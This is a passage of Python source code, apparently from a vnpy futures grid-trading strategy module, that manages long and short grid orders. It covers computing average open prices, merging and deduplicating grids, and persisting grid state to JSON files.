self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.upGrids)
lots = self.maxLots - remainLots
upline = max(upline, max_short_price+self.gridHeight*upRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
if lots > 0:
# 做空,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.upGrids.append(grid)
self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
def recount_avg_open_price(self):
"""计算网格的平均开仓价"""
up_open_list = [x for x in self.upGrids if x.openStatus]
self.max_up_open_price = 0 - sys.maxsize
self.avg_up_open_price = 0 - sys.maxsize
self.min_dn_open_price = sys.maxsize
self.avg_dn_open_price = sys.maxsize
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
for x in up_open_list:
self.max_up_open_price = max(self.max_up_open_price, x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_up_open_price = total_price/total_volume
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
dn_open_list = [x for x in self.dnGrids if x.openStatus]
for x in dn_open_list:
self.min_dn_open_price = min(self.min_dn_open_price,x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_dn_open_price = total_price/total_volume
def count_avg_open_price(self, grid_list):
"""计算平均开仓价"""
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
avg_price = EMPTY_FLOAT
for g in grid_list:
total_price += g.openPrice * g.volume
total_volume += g.volume
if total_volume > EMPTY_INT:
avg_price = total_price / total_volume
return avg_price
def combineOpenedGrids(self,direction,type=EMPTY_STRING):
"""合并已开仓的网格"""
total_open_price = EMPTY_FLOAT
total_close_price = EMPTY_FLOAT
total_volume = EMPTY_INT
saved_grid = None
if direction == DIRECTION_SHORT:
opened_short_grids = self.getGrids(direction=direction, opened=True, ordered=False, type = type)
if len(opened_short_grids)<=1:
return
self.writeCtaLog(u'{}个空网格合并为1个'.format(len(opened_short_grids)))
saved_grid = opened_short_grids[-1]
for g in opened_short_grids:
total_open_price += g.openPrice * g.volume
total_close_price += g.closePrice * g.volume
total_volume += g.volume
if g != saved_grid:
self.writeCtaLog(u'删除空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
self.upGrids.remove(g)
else:
self.writeCtaLog(u'保留空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
# 更新网格的开仓价和仓位数量
saved_grid.openPrice = int((total_open_price / total_volume)/self.minDiff)*self.minDiff
saved_grid.volume = total_volume
saved_grid.closePrice = int((total_close_price / total_volume)/self.minDiff)*self.minDiff
self.writeCtaLog(u'合并后空网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
elif direction == DIRECTION_LONG:
opened_long_grids = self.getGrids(direction=direction, opened=True, ordered=False, type=type)
if len(opened_long_grids) <= 1:
return
self.writeCtaLog(u'{}个多网格合并为1个'.format(len(opened_long_grids)))
saved_grid = opened_long_grids[-1]
for g in opened_long_grids:
total_open_price += g.openPrice * g.volume
total_close_price += g.closePrice * g.volume
total_volume += g.volume
if g != saved_grid:
self.writeCtaLog(u'删除多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
self.dnGrids.remove(g)
else:
self.writeCtaLog(u'保留多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
# 更新网格的开仓价和仓位数量
saved_grid.openPrice = int((total_open_price / total_volume) / self.minDiff) * self.minDiff
saved_grid.volume = total_volume
saved_grid.closePrice = int((total_close_price / total_volume) / self.minDiff) * self.minDiff
self.writeCtaLog(
u'合并后多网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
def clearDuplicateGrids(self, direction=EMPTY_STRING, type=EMPTY_STRING):
"""去除重复开仓价的未开仓网格"""
if direction == DIRECTION_SHORT or direction==EMPTY_STRING:
if len(self.upGrids) < 2:
return
checking_grids = self.getGrids(direction=DIRECTION_SHORT, opened=False,ordered=False,type=type)
if len(checking_grids) < 2:
return
open_price_list = []
remove_grids = []
for g in checking_grids:
if g.openPrice in open_price_list:
remove_grids.append(g)
continue
open_price_list.append(g.openPrice)
for rg in remove_grids:
try:
self.upGrids.remove(rg)
except:
pass
if direction == DIRECTION_LONG or direction==EMPTY_STRING:
if len(self.dnGrids) < 2:
return
checking_grids = self.getGrids(direction=DIRECTION_LONG, opened=False, ordered=False, type=type)
if len(checking_grids) < 2:
return
open_price_list = []
remove_grids = []
for g in checking_grids:
if g.openPrice in open_price_list:
remove_grids.append(g)
continue
open_price_list.append(g.openPrice)
for rg in remove_grids:
try:
self.dnGrids.remove(rg)
except:
pass
def save(self, direction=None):
"""
保存网格至本地Json文件"
2017/11/23 update: 保存时,空的列表也保存
:param direction:
:return:
"""""
# 回测模式不保存
if self.strategy and getattr(self.strategy,'backtesting',False):
return
# 更新开仓均价
self.recount_avg_open_price()
grids_save_path = self.get_data_folder()
# 确保json名字与策略一致
if self.jsonName != self.strategy.name:
self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
self.jsonName = self.strategy.name
# 移除旧版上/下网格列表
old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
if os.path.exists(old_up_json_file):
try:
os.remove(old_up_json_file)
except:
pass
if os.path.exists(old_dn_json_file):
try:
os.remove(old_dn_json_file)
except:
pass
# 新版网格持久化文件
grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
self.json_file_path = grid_json_file
data = {}
up_grids = []
for grid in self.upGrids:
up_grids.append(grid.toJson())
dn_grids = []
for grid in self.dnGrids:
dn_grids.append(grid.toJson())
data[u'up_grids'] = up_grids
data[u'dn_grids'] = dn_grids
with open(grid_json_file, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
self.writeCtaLog(u'GrideTrade保存文件{}完成'.format(grid_json_file))
def load(self, direction, openStatusFilter=[]):
"""
加载本地Json至网格
:param direction: DIRECTION_SHORT,做空网格;DIRECTION_LONG,做多网格
:param openStatusFilter: 缺省,不做过滤;True,只提取已开仓的数据,False,只提取未开仓的数据
:return:
"""
data = {}
grids_save_path = self.get_data_folder()
if self.jsonName != self.strategy.name:
self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
self.jsonName = self.strategy.name
# 移除旧版上/下网格列表
old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
if os.path.exists(old_up_json_file):
try:
with open(old_up_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['up_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
data['up_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_up_json_file)
except:
pass
if os.path.exists(old_dn_json_file):
try:
with open(old_dn_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['dn_grids'] = json.load(f)
except IOError as ex:
self.writeCtaLog(u'读取网格{}出错,ex:{}'.format(old_dn_json_file,str(ex)))
data['dn_grids'] = []
try: # 移除旧版下网格文件
os.remove(old_dn_json_file)
except:
pass
# 若新版文件不存在,就保存;若存在,就优先使用新版数据文件
grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
if not os.path.exists(grid_json_file):
if len(data) == 0:
data['up_grids'] = []
data['dn_grids'] = []
self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
else:
self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
try:
with open(grid_json_file, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
except Exception as ex:
self.writeCtaLog(u'写入网格文件{}异常:{}'.format(grid_json_file,str(ex)))
else:
# 读取json文件
try:
with open(grid_json_file, 'r', encoding='utf8') as f:
data = json.load(f)
except Exception as ex:
self.writeCtaLog(u'读取网格文件{}异常:{}'.format(grid_json_file,str(ex)))
# 从文件获取数据
json_grids = []
if direction == DIRECTION_SHORT :
json_grids = data['up_grids'] if 'up_grids' in data else []
elif direction == DIRECTION_LONG:
json_grids = data['dn_grids'] if 'dn_grids' in data else []
grids = []
for i in json_grids:
closePrice = float(i['closePrice'])
openPrice = float(i['openPrice'])
stopPrice = float(i['stopPrice'])
self.writeCtaLog(u'load Grid:open:{0},close:{1},stop:{2}'.format(openPrice, closePrice, stopPrice))
grid = CtaGrid(direction=i['direction'], openprice=openPrice, closeprice=closePrice,
stopprice=stopPrice, volume=i['volume'])
grid.orderStatus = i['orderStatus'] # 挂单状态: True,已挂单,False,未挂单
grid.orderRef = i['orderRef'] # OrderId
grid.openStatus = i['openStatus'] # 开仓状态
grid.closeStatus = i['closeStatus'] # 平仓状态
strTime = i['openDatetime']
if strTime == EMPTY_STRING or type(strTime)==type(None):
grid.openDatetime = None
else:
grid.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')
try:
grid.tradedVolume = i['tradedVolume'] # 已交易的合约数量
except KeyError:
grid.tradedVolume = EMPTY_INT
try:
grid.lockGrids = i['lockGrids']
except KeyError:
grid.lockGrids = []
try:
grid.type = i['type']
if grid.type == False:
grid.type = EMPTY_STRING
except KeyError:
grid.type = EMPTY_STRING
try:
grid.reuse = i['reuse']
except KeyError:
grid.reuse = False
try:
grid.openPrices = i['openPrices']
except KeyError:
grid.openPrices = {}
try:
grid.snapshot = i['snapshot']
except KeyError:
grid.snapshot = {}
self.writeCtaLog(grid.toStr())
# 增加对开仓状态的过滤,满足某些策略只提取已开仓的网格数据
if len(openStatusFilter) > 0:
if grid.openStatus not in openStatusFilter:
continue
grids.append(grid)
# 更新开仓均价
self.recount_avg_open_price()
return grids
def get_data_folder(self):
"""获取数据目录"""
# 工作目录
currentFolder = os.path.abspath(os.path.join(os.getcwd(), u'data'))
if os.path.isdir(currentFolder):
# 如果工作目录下,存在data子目录,就使用data子目录
return currentFolder
else:
# 否则,使用缺省保存目录 vnpy/trader/app/ctaStrategy/data
return os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
def changeStrategyName(self, old_name, new_name):
"""
在线更换策略实例名称,需要把Json文件也转移
:param old_name:
:param new_name:
:return:
"""
if old_name == new_name:
self.writeCtaLog(u'更换策略实例名称失败,old:{} =>new:{}'.format(old_name, new_name))
return
data_folder = self.get_data_folder()
self.jsonName = new_name
# 旧文件
old_up_json_file = os.path.join(data_folder, u'{0}_upGrids.json'.format(old_name))
old_dn_json_file = os.path.join(data_folder, u'{0}_dnGrids.json'.format(old_name))
old_json_file = os.path.join(data_folder, u'{0}_Grids.json'.format(old_name))
# 新文件
self.json_file_path = os.path.join(data_folder, u'{0}_Grids.json'.format(new_name))
if os.path.isfile(self.json_file_path): # 新文件若存在,移除
try:
os.remove(self.json_file_path)
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 删除文件:{}异常:{}'.format(old_up_json_file,str(ex)))
# 移动文件
if os.path.isfile(old_json_file):
try:
shutil.move(old_json_file, self.json_file_path)
return
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 移动文件:{}=》{}异常:{}'.format(old_up_json_file, self.json_file_path, str(ex)))
else:
data = {}
if os.path.isfile(old_up_json_file):
try:
with open(old_up_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['up_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
data['up_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_up_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_up_json_file))
else:
data['up_grids'] = []
if os.path.isfile(old_dn_json_file):
try:
with open(old_dn_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['dn_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_dn_json_file))
data['dn_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_dn_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_dn_json_file))
else:
data['dn_grids'] = []
try:
with open(self.json_file_path, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
except IOError as ex:
self.writeCtaLog(u'写入网格文件{}异常:{}'.format(self.json_file_path, str(ex)))
def getJsonFilePath(self):
"""
返回上下网格的文件路径
:return:
"""
return self.json_file_path
def getTypesOfOpenedGrids(self, direction, include_empty=False):
"""
获取开仓的网格类型列表
:param direction:
:param include_empty: 是否包含空值的类型
:return:
"""
grids = self.getOpenedGrids(direction)
type_list = []
for g in grids:
if g.type not in type_list and (g.type !=EMPTY_STRING if not include_empty else True):
type_list.append(g.type)
return type_list
class CtaLegacyGridTrade(object):
"""网格交易类
包括两个方向的网格队列,
v1, 传统网格:上网格做多,下网格做空
"""
def __init__(self, strategy, maxlots=5, height=2, win=2, vol=1, minDiff = 1):
"""初始化
maxlots,最大网格数
height,网格高度(绝对值,包含minDiff)
win,盈利数(包含minDiff)
vol,网格开仓数
minDiff, 最小价格跳动
"""
self.minDiff = minDiff
self.strategy = strategy
self.jsonName = self.strategy.origName #策略名称
self.useMongoDb = True
self.maxLots = maxlots # 缺省网格数量
self.gridHeight = height # 最小网格高度
self.gridWin = win # 最小止盈高度
self.volume = vol # 每次网格开仓数量
self.volumeList = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # 梯级开仓数量比例
self.upGrids = [] # 上网格列表,专门做多
self.dnGrids = [] # 下网格列表,专门做空
self.avg_up_open_price = EMPTY_FLOAT # 上网格开仓均价
self.avg_dn_open_price = EMPTY_FLOAT # 下网格开仓均价
self.max_up_open_price = EMPTY_FLOAT # 上网格开仓均价
self.min_dn_open_price = EMPTY_FLOAT # 下网格开仓均价
self.up_json_file_path = None # 下网格(做多网格)的路径
self.dn_json_file_path = None # 下网格(做多网格)的路径
self.fixedGrids = False # Set grids with fixed price or not
self.fixedGridInitPrice = EMPTY_FLOAT
self.gridBufferLength = 5 # Close grids only when (# of grids >= this value)
def enableFixedGrids(self, price, gridbufferlen=5):
self.fixedGrids = True
self.fixedGridInitPrice = price
self.gridBufferLength = gridbufferlen
def disableFixedGrids(self, price):
self.fixedGrids = False
self.fixedGridInitPrice = 0
def changeGridHeight(self, grid_height=EMPTY_FLOAT, grid_win=EMPTY_FLOAT):
self.gridHeight = grid_height
self.gridWin = grid_win
def getVolumeRate(self, gridIndex=EMPTY_INT):
"""获取网格索引对应的开仓数量比例"""
if gridIndex >= len(self.volumeList) or gridIndex < 0:
return 1
rate = self.volumeList[gridIndex]
if rate == 0:
return 1
else:
return rate
def initGrid(self, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, max_lots=EMPTY_INT, reuse=False):
"""初始化网格队列,突破开仓
upline,上阻力线
dnline,下支撑线
"""
if max_lots > EMPTY_INT:
lots = max_lots
else:
lots = self.maxLots
newupline = upline
newdnline = dnline
if self.fixedGrids is True:
if abs(self.fixedGridInitPrice - upline) % self.gridHeight > 0:
newupline = upline - abs(self.fixedGridInitPrice - upline) % self.gridHeight + self.gridHeight # >= current value
newdnline = dnline - abs(self.fixedGridInitPrice - dnline) % self.gridHeight # <= current value
self.writeCtaLog(u'初始化网格队列,upline:{}({}),dnline:{}({}), '.format(upline, newupline, dnline, newdnline))
upline = newupline
dnline = newdnline
# 初始化上网格列表
if len(self.upGrids) == 0:
self.upGrids = self.load(direction= DIRECTION_LONG)
if len(self.upGrids) > 0:
self.writeCtaLog(u'上网格从文件{}加载完成'.format(self.up_json_file_path))
else:
# 做多,开仓价为上阻力线+网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=upline + self.gridHeight*i,
closeprice=upline + self.gridHeight*i - self.gridWin,
volume=self.volume*self.getVolumeRate(i))
if reuse:
grid.reuse = reuse
self.upGrids.append(grid)
self.writeCtaLog(u'上网格{0}~{1}初始化完成'.format(upline,upline+self.gridHeight*self.maxLots))
self.save(direction=DIRECTION_LONG)
# 初始化下网格列表
if len(self.dnGrids) == 0:
self.dnGrids = self.load(direction= DIRECTION_SHORT)
if len(self.dnGrids) > 0:
self.writeCtaLog(u'下网格从文件{}加载完成'.format(self.dn_json_file_path))
else:
for i in range(0, lots, 1):
# 做空,开仓价为下阻力线-网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=dnline - self.gridHeight * i,
closeprice=dnline - self.gridHeight * i + self.gridWin,
volume=self.volume*self.getVolumeRate(i))
if reuse:
grid.reuse = reuse
self.dnGrids.append(grid)
self.writeCtaLog(u'下网格{0}~{1}初始化完成'.format(dnline,dnline-self.gridHeight*self.maxLots))
self.save(direction=DIRECTION_SHORT)
def writeCtaLog(self, log):
self.strategy.writeCtaLog(log)
def toStr(self,direction):
"""显示网格"""
pendingCloseList = u'' # 平仓清单
pendingOpenList = u'' # 开仓清单
deactiveList = u'' # 待激活清单
openedVolumeDict = {} # 开仓数量汇总
if direction == DIRECTION_SHORT:
numDeactivated = 0
for grid in self.dnGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus :
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'{}[{}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{}{}->{},sp:{},v:{}/{}];'\
.format(t, grid.openPrice, grid.closePrice, grid.volume, grid.stopPrice, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{}{},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
if numDeactivated < 5:
deactiveList = deactiveList + u'[{}{}];'.format(t,grid.openPrice)
numDeactivated += 1
else:
break
return u'Short:空:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList, pendingOpenList, deactiveList)
if direction == DIRECTION_LONG:
numDeactivated = 0
for grid in self.upGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus:
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{}, v:{}/{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{}{},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
if numDeactivated < 5:
deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
numDeactivated += 1
else:
break
return u'Long:多:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList,pendingOpenList,deactiveList)
def getGridsWithTypes(self, direction, types=[]):
"""获取符合类型的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.type in types]
return grids
def getOpenedGridsWithTypes(self, direction, types=[]):
"""获取符合类型的持仓网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.openStatus == True and x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.openStatus == True and x.type in types]
return grids
def getOpenedGrids(self, direction):
"""获取已开仓的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.dnGrids
if x.openStatus == True]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
grids = [x for x in self.upGrids
if x.openStatus == True]
return grids
def getGrids(self, direction, ordered=False, opened=False, closed=False, begin=EMPTY_FLOAT, end=EMPTY_FLOAT, type=EMPTY_STRING, delta=0):
"""获取未挂单的网格
direction:做多、做空方向: 做空方向时,从dnGrids中获取; 做多方向时,从upGrids中获取
ordered:是否已提交至服务器
opened:是否已开仓
closed:是否已平仓
begin:开始价格,
end:结束价格,
delta:基于begin价格的偏移,处理滑点,得到更好的开仓点位
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_SHORT:
if begin == EMPTY_FLOAT: begin = sys.maxsize
if end == EMPTY_FLOAT: end = 0-sys.maxsize
begin += delta
grids = [x for x in self.dnGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice >= begin
and x.openPrice <= end
and x.type == type]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_LONG:
if begin == EMPTY_FLOAT: begin = 0-sys.maxsize
if end == EMPTY_FLOAT: end = sys.maxsize
begin -= delta
grids = [x for x in self.upGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice <= begin
and x.openPrice >= end
and x.type == type]
return grids
def getGridById(self,direction, id):
"""寻找指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_SHORT:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
if direction == DIRECTION_LONG:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
return None
def getPosition(self,direction, type=EMPTY_STRING):
"""获取特定类型的网格持仓"""
if direction == DIRECTION_SHORT:
long_vol = [x.volume-x.tradedVolume for x in self.dnGrids if x.openStatus and x.type == type]
return sum(long_vol)
if direction == DIRECTION_LONG:
short_vol = [x.volume - x.tradedVolume for x in self.upGrids if x.openStatus and x.type == type]
return sum(short_vol)
def updateOrderRef(self, direction, openPrice, orderRef):
"""更新网格的orderId"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
def cancelOrderRef(self,direction, openPrice):
"""网格撤单"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'下网格撤单[{0}]'.format(x.openPrice))
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'上网格撤单[{0}]'.format(x.openPrice))
def getGridbyOpenPrice(self, direction, openPrice, orderRef = EMPTY_STRING):
"""通过开仓价和委托状态获取网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
if direction == DIRECTION_LONG:
for x in self.upGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
self.writeCtaLog(u'异常,getGridbyOpenPrice找不到网格[{0},openprice={1},orderRef={2}]'.format(direction, openPrice, orderRef))
return None
def getGrid(self, direction, openPrice=EMPTY_FLOAT, closePrice=EMPTY_FLOAT, orderRef=EMPTY_STRING, t=EMPTY_STRING):
"""获取网格"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
if direction == DIRECTION_LONG:
for x in self.upGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
self.writeCtaLog(u'异常,getGrid找不到网格[direction={0},oepnPrice={1},closePrice={2},orderRef={3},t={4}]'.format(direction, openPrice, closePrice, orderRef, t))
return None
def updateClosePrice(self, direction, closePrice=EMPTY_FLOAT, type=EMPTY_STRING):
"""获取网格"""
# if num(opened Grids) <= 5: set closePrice to 0
# else: set closePrice to the specified one (should be the closePrice of the newest Grid)
numChanged = 0
newPrice = EMPTY_FLOAT
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.type == type and x.openStatus is True:
x.closePrice = newPrice
numChanged += 1
if numChanged >= self.gridBufferLength:
newPrice = closePrice
for x in self.dnGrids:
if x.type == type and x.openStatus is True:
x.closePrice = newPrice
if direction == DIRECTION_LONG:
for x in self.upGrids:
if x.type == type and x.openStatus is True:
x.closePrice = newPrice
numChanged += 1
if numChanged >= self.gridBufferLength:
newPrice = closePrice
for x in self.upGrids:
if x.type == type and x.openStatus is True:
x.closePrice = newPrice
self.writeCtaLog(u'updateClosePrice() {}: update closePrice to {} for all opened grids({})'.format(direction, newPrice, numChanged))
def getFirstLastGrid(self, direction,type = EMPTY_STRING):
"""获取最前/后一个的网格"""
# 做多网格:,first =开仓价最高一个,last= 最低一个
if direction == DIRECTION_LONG:
short_grids = self.getGridsWithTypes(direction=direction, types=[type])
if short_grids is None or len(short_grids) ==0 :
return None, None
if len(short_grids) == 1:
return short_grids[0],short_grids[0]
# 价格由低至高排列
sortedGrids = sorted(short_grids, key=lambda g:g.openPrice)
return sortedGrids[-1], sortedGrids[0]
# 做空网格: first =最低一个,last= 开仓价最高一个
if direction == DIRECTION_SHORT:
long_grids = self.getGridsWithTypes(direction=direction, types=[type])
if long_grids is None or len(long_grids) ==0:
return None, None
if len(long_grids) == 1:
return long_grids[0], long_grids[0]
sortedGrids = sorted(long_grids, key=lambda g: g.openPrice)
return sortedGrids[0], sortedGrids[-1]
return None,None
def getLastOpenedGrid(self, direction,type = EMPTY_STRING,orderby_asc=True):
"""获取最后一个开仓的网格"""
if direction == DIRECTION_LONG:
opened_long_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_long_grids is None or len(opened_long_grids) ==0 :
return None
if len(opened_long_grids) > 1:
sortedGrids = sorted(opened_long_grids, key=lambda g:g.openPrice)
if orderby_asc:
# 取价格最高的一格
opened_long_grids = sortedGrids[-1:]
else:
# 取价格最低的一格
opened_long_grids = sortedGrids[0:1]
return opened_long_grids[0]
if direction == DIRECTION_SHORT:
opened_short_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_short_grids is None or len(opened_short_grids) ==0:
return None
if len(opened_short_grids) > 1:
sortedGrids = sorted(opened_short_grids, key=lambda g: g.openPrice)
if orderby_asc:
# 取价格最低的一格
opened_short_grids = sortedGrids[0:1]
else:
# 取价格最高的一格
opened_short_grids = sortedGrids[-1:]
return opened_short_grids[0]
def closeGrid(self, direction, closePrice, closeVolume):
"""网格交易结束"""
if direction == DIRECTION_SHORT:
for x in self.dnGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.dnGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'下网格交易部分结束[{0}->{1}],减少仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume))
